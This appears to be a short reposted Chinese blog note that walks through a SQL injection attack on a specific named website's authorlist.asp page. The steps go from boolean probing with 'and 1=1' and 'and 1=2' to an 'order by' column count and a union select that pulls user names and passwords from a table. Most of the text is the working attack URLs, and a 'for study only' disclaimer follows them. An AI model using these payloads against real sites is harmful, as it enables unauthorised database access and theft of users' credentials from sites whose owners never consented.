注入点:http://www.romance-sky.com/authorlist.asp?id=227
分析:and 1=1 正常and 1=2出错.存在注入漏洞
字段数目判断:http://www.romance-sky.com/authorlist.asp?id=227 order by 7正常.表示字段数为7
http://www.romance-sky.com/authorlist.asp?id=227 and 1=2 union select 1,2,3,4,5,6,7 from 表名
返回2,4(字符型),5(字符型)处可以利用.
http://www.romance-sky.com/authorlist.asp?id=227%20and%201=2%20union%20select%201,id,3,密码,name,6,7%20from%20表名
这样就可以得到相应的用户名和密码.
上文中的表名和密码等字段名是假设的.
本文仅供学习研究,请勿用于任何不法行为,否则后果自负.
转载于:https://www.cnblogs.com/baogg/articles/1989388.html